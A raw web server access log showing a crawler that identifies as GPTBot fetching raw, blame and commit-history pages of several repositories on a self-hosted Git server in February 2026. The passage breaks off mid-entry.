[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9957] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 10114] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10419] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10420] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10426] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10426] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11516] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" -[17/Feb/2026:13:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15821] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" -[17/Feb/2026:13:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11124] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" -[17/Feb/2026:13:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11896] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" -[17/Feb/2026:13:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11510] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11510] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11031] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11521] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11531] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129" [Client 74.7.227.38] [Length 12204] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" [Client 74.7.227.38] [Length 12464] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fassetpilot.ico" [Client 74.7.227.38] [Length 23877] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fQUICKSTART.md" [Client 74.7.227.38] [Length 28166] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" -[17/Feb/2026:13:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:13:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10390] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10393] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:13:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:13:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11153] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" -[17/Feb/2026:13:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html?display=rendered" [Client 74.7.227.38] [Length 14599] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10389] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10395] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" -[17/Feb/2026:13:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 